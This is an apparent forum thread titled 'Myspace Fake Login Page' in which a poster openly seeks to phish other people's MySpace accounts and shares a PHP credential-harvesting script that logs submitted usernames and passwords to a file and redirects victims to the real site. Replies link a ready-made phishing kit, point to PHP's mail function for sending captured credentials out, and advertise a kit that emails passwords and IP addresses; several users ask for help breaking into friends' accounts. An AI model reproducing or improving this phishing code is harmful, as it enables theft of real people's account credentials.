nagios
+ Reply to Thread
Page 1 of 2 12 LastLast
Results 1 to 15 of 23

Thread: Myspace Fake Login Page

  1. #1
    Join Date
    Jun 2007
    Posts
    6

    Cool Myspace Fake Login Page

    Please, I need help hacking some people's myspaces. Before any of you guys are like, "That is not possible", or "There is no use in it", I tell you this. I really don't care. I have created a fake myspace login page. I already uploaded the html file and php file to it, so everything is ready, except one thing. I need to be able to recieve the username and pass through my email or any other source. Please tell me how to edit this php file so that I can direct the information to myself. These are the contents of the php file...

    <?php
    header("Location: {the name of the myspace site here}");
    $handle = fopen("out.txt", "a");
    foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

  2. #2
    Join Date
    Apr 2007
    Posts
    109
    Quote Originally Posted by yahoowizard View Post
    Please, I need help hacking some people's myspaces. Before any of you guys are like, "That is not possible", or "There is no use in it", I tell you this. I really don't care. I have created a fake myspace login page. I already uploaded the html file and php file to it, so everything is ready, except one thing. I need to be able to recieve the username and pass through my email or any other source. Please tell me how to edit this php file so that I can direct the information to myself. These are the contents of the php file...

    <?php
    header("Location: {the name of the myspace site here}");
    $handle = fopen("out.txt", "a");
    foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
    if you want a very good one that has already been made download it from [URL="http://login2myspace2.t*5.com/bestone.zip"]here[/URL]

  3. #3
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by yahoowizard View Post
    Please, I need help hacking some people's myspaces. Before any of you guys are like, "That is not possible", or "There is no use in it", I tell you this. I really don't care. I have created a fake myspace login page. I already uploaded the html file and php file to it, so everything is ready, except one thing. I need to be able to recieve the username and pass through my email or any other source. Please tell me how to edit this php file so that I can direct the information to myself. These are the contents of the php file...
    I thought you said you created the script? If you knew enough PHP to make it, I'm sure you would know how to do this...

    This page should help you:

    [url]http://www.php.net/function.mail[/url]

  4. #4
    Join Date
    Sep 2006
    Posts
    1,649
    I am in doubt that he actually scripted that, he probably just found the code on some forum and tried to use it. Anyway, you should go to [url]http://www.w*schools.com[/url] to learn PHP, it's a great resource. Do some research on PHP and mailing.

  5. #5
    Join Date
    Jun 2007
    Posts
    1
    Hey guys, I just was watching for a fake myspace login and found this forum, I saw all net tools forum and it's a great community.

    The issue is this, anyone knows the script to edit the Home link above the myspace profile?

    Thanks!

  6. #6
    Join Date
    Jul 2007
    Posts
    1
    dipman how do you get the email and pass from the page that i downloaded?

  7. #7
    Join Date
    Jul 2007
    Posts
    79
    dipman i have read like all the forum post that u have made about how 2 use a fake login and gueess whut i still cant do it lol

    if the code that yahoowizzard posted actually works how wud u get the password and email sent 2 a yahoo account???

    im not some awesome hacker lol im just starting and help wud be greatly appreicated

    this all started when this guy hacked my and a frends myspace and now we gotta no how he did it and how 2 do it back 2 him


    plzzz help me
    Last edited by drumgodmaggott; 07-12-2007 at 11:58 PM.

  8. #8
    Join Date
    Jul 2007
    Posts
    7
    Wow, thats so lame to phish people's passwords and shit.

  9. #9
    Join Date
    Jul 2007
    Posts
    1
    read about how to use the $_get and $_post variable in PHP to grab sent data and how to use html forms to send the variable from.

  10. #10
    Join Date
    May 2007
    Posts
    2
    Quote Originally Posted by dipman44 View Post
    if you want a very good one that has already been made download it from [URL="http://login2myspace2.t*5.com/bestone.zip"]here[/URL]


    Can someone please help me? I'm confused on how to use the codes.

  11. #11
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by pwnography View Post
    read about how to use the $_get and $_post variable in PHP to grab sent data and how to use html forms to send the variable from.
    I am posting here to show my appreciation for your username.

    That is all.
    Who needs drugs when you have electrons?

  12. #12
    Join Date
    Nov 2007
    Posts
    3
    how do you actually use the PHP im stupid when it comes to fake login pages. I need one to get into a friends account. How would i do this?

  13. #13
    Join Date
    Nov 2007
    Posts
    17

    :)

    I have made one that emails you the Username: Password: IP: to any email account
    It is all packed in a .zip with a really easy to follow read me


    View my post for details!

    Hope it is very useful.
    Last edited by Lethal323; 11-22-2007 at 01:36 AM.

  14. #14
    Join Date
    Nov 2007
    Posts
    3
    Quote Originally Posted by Lethal*2* View Post
    I have made one that emails you the Username: Password: IP: to any email account
    It is all packed in a .zip with a really easy to follow read me


    View my post for details!

    Hope it is very useful.
    is the file called "bestone.zip"

  15. #15
    Join Date
    Nov 2007
    Posts
    3
    I signed up for the x*0 hosting and its very confusing. How do I set it up?

+ Reply to Thread

Similar Threads

  1. myspace fake log in page?
    By 2l3x in forum General discussion
    Replies: 3
    Last Post: 02-21-2008, 11:25 PM
  2. My fake login page
    By jeffrey_978 in forum Programming
    Replies: 19
    Last Post: 01-14-2008, 04:12 PM
  3. my first fake login page
    By trickytap in forum Internet Privacy
    Replies: 8
    Last Post: 05-01-2007, 03:19 PM
  4. Fake msn login page
    By Carlo in forum Internet Privacy
    Replies: 175
    Last Post: 04-09-2007, 09:42 AM
  5. FAke MYSpace page
    By XxD3MONxX in forum Internet Privacy
    Replies: 1
    Last Post: 11-07-2006, 06:35 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts